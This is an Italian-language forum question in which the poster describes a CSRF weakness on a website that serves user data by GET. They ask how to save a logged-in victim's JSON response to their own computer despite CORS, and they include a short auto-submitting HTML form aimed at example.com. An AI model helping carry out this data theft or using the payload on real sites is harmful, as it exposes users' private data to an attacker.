Quindi ho trovato una vulnerabilità CSRF su un sito web. Il sito Web sta inviando la richiesta GET per ottenere i dati dell'utente e non c'è protezione. Quindi, utilizzando l'HTML, posso ottenere i dati dal sito Web se l'utente ha effettuato l'accesso, ma non posso salvarlo sul mio sito web.
Non posso usare javascript XHR a causa di CORS. Quindi c'è un modo per salvare la risposta JSON del sito Web vulnerabile attraverso un modulo HTML in un file separato sul mio computer?
Codice HTML che mostra solo i dati dell'utente:
<html>
<body>
<form id="myform" enctype='text/html' action="https://example.com/v3/user" method="GET"
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>